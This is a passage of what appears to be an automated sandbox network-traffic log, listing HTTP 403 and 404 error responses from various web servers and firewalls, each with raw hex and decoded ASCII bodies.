resource.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:45:36 GMTServer: Apache/2Content-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:45:37 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveCache-Control: max-age=15Expires: Wed, 22 Mar 2023 04:45:52 GMTX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=j%2B9aDNkk0odKKJ7GJOB221%2BkrTGnHGtgqxH9gXaDcYFnY6uprK%2BiFUZ4FNKho5oq8A7yDFdiIogdHgjHPmn1a5mHadNFAA5sFufpu5VB73yRb0Kzw515%2F2V9GN7ezQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7abbc946bc7c9969-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 31 61 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e 20 52 65 71 75 69 72 65 64 21 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e Data Ascii: 11a3<!DOCTYPE html><!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--><!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--><!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--><!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--><head><title>Attention Required! | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta htt
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:45:38 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=2EWEhyyZxCnoEF9x9RI7RwdKK7XyE%2FxH1EaPrxMP8WZheIP8vARLeCbdUKH1VqOO%2FAqMdKgYhPnks%2BFDE6u0JASSGopPmWYpGaGAUPBCdeuUkGUUUE60n05QkA40giKL"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7abbc94a1f4d3a4a-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:45:38 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=P817szvDEmqfaP72h5j4cJjkLp1tzCTUI11EdmCAx5zChl%2FVX8gsMh4dCUvid0FyiaHdrE2ClzYvWQfG4tpuqZdRq%2BLx4umSsVUNAnPwz2MB39%2Fo3cZCYoy5Nd4m22Sb"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7abbc94a4f723a4a-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:45:38 GMTServer: ApacheX-Powered-By: PHP/7.3.33Content-Length: 0Keep-Alive: timeout=5, max=149Connection: Keep-AliveContent-Type: text/html; charset=UTF-8
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveDate: Wed, 22 Mar 2023 04:45:38 GMTCache-Control: no-storeCache-Control: no-cache, no-store, must-revalidateCache-Control: max-age=0X-Cache-Status: X-Zen-Fury: 87ad03ed4d925b5e2c349743af2cd74426d6dcf2Server: ZENEDGEData Raw: 31 66 39 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 20 69 66 20 28 74 79 70 65 6f 66 28 5f 5f 5f 7a 65 6e 29 20 3d 3d 3d 20 22 75 6e 64 65 66 69 6e 65 64 22 29 20 7b 73 65 74 54 69 6d 65 6f 75 74 28 61 72 67 75 6d 65 6e 74 73 2e 63 61 6c 6c 65 65 2c 20 35 30 29 3b 20 72 65 74 75 72 6e 3b 20 7d 5f 5f 5f 7a 65 6e 2e 68 69 63 28 22 5f 5f 5a 45 48 49 43 33 33 30 37 22 2c 20 31 36 37 39 34 36 30 33 33 38 2c 20 31 2c 20 30 2c 20 36 30 29 3b 20 7d 29 28 29 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 61 73 79 6e 63 3d 22 61 73 79 6e 63 22 20 73 72 63 3d 22 2f 5f 5f 7a 65 6e 65 64 67 65 2f 61 73 73 65 74 73 2f 68 69 63 2e 6a 73 3f 76 3d 31 36 37 34 32 30 37 34 32 32 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 64 69 76 3e 3c 68 31 3e 34 30 33 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 61 73 79 6e 63 3d 22 61 73 79 6e 63 22 20 73 72 63 3d 22 2f 5f 5f 7a 65 6e 65 64 67 65 2f 61 73 73 65 74 73 2f 66 2e 6a 73 3f 76 3d 31 36 37 34 32 30 37 34 32 32 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 1f9<html><head><title>403 Forbidden</title><script type="text/javascript">(function(){ if (typeof(___zen) === "undefined") {setTimeout(arguments.callee, 50); return; }___zen.hic("__ZEHIC3307", 1679460338, 1, 0, 60); })()</script><script type="text/javascript" async="async" src="/__zenedge/assets/hic.js?v=1674207422"></script></head><body><center><div><h1>403</h1></div><h1>Forbidden</h1></center><script type="text/javascript" async="async" src="/__zenedge/assets/f.js?v=1674207422"></script></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 22 Mar 2023 04:45:38 GMTServer: ApacheContent-Length: 13Keep-Alive: timeout=15, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 Data Ascii: 404 Not Found
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:45:39 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveServer: nginxVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:45:39 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveServer: nginxVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenCache-Control: no-cache, must-revalidateContent-Length: 77561Content-Type: text/html; charset=UTF-8Date: Wed, 22 Mar 2023 04:45:40 UTCExpires: Thu, 01 Jan 1970 00:00:00 UTCPragma: no-cacheServer: SquarespaceX-Contextid: MNjzAVct/UjSm08FRData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 3
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:45:40 GMTContent-Type: text/htmlContent-Length: 559Connection: keep-aliveServer: IdeaWebServer/5.1.0Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 33 3c 2f 74 69 74 6c 65 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 69 64 65 61 2f 73 74 61 74 69 63 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 74 65 78 74 22 3e 3c 68 31 3e 45 72 72 6f 72 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 74 65 78 74 2d 73 74 72 6f 6e 67 22 3e 3c 68 31 3e 34 30 33 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 74 65 78 74 22 3e 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 64 65 73 63 72 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 64 6f 63 75 6d 65 6e 74 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 20 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>Error 403</title><link href="/idea/static/style.css" rel="stylesheet"></head><body><div class="error-container"><div class="error-text"><h1>Error</h1></div><div class="error-text-strong"><h1>403</h1></div><div class="error-text"><h1>Forbidden</h1></div></div><div class="error-descr-container"><p>You don't have permission to access this document.</p></div> </body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Wed, 22 Mar 2023 04:45:41 GMTContent-Type: text/html; charset=utf-8Content-Length: 148Connection: keep-aliveX-Powered-By: ExpressContent-Security-Policy: default-src 'none'X-Content-Type-Options: nosniffX-Kong-Upstream-Latency: 2X-Kong-Proxy-Latency: 0Via: kong/1.4.1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 70 72 65 3e 43 61 6e 6e 6f 74 20 50 4f 53 54 20 2f 70 61 72 6b 69 6e 67 2f 3c 2f 70 72 65 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><title>Error</title></head><body><pre>Cannot POST /parking/</pre></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: Sucuri/CloudproxyDate: Wed, 22 Mar 2023 04:45:42 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveX-Sucuri-ID: 15015X-XSS-Protection: 1; mode=blockX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffX-Sucuri-Block: BNP006Data Raw: 33 30 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 73 75 63 75 72 69 2e 6e 65 74 2f 73 75 63 75 72 69 2d 66 69 72 65 77 61 6c 6c 2d 62 6c 6f 63 6b 2e 63 73 73 22 20 2f 3e 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 63 65 6e 74 65 72 20 63 6c 65 61 72 66 69 78 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 53 75 63 75 72 69 20 57 65 62 53 69 74 65 20 46 69 72 65 77 61 6c 6c 20 2d 20 41 63 63 65 73 73 20 44 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 33 30 30 2c 36 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 6d 61 69 6e 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 3c 68 65 61 64 65 72 20 63 6c 61 73 73 3d 22 61 70 70 2d 68 65 61 64 65 72 20 63 6c 65 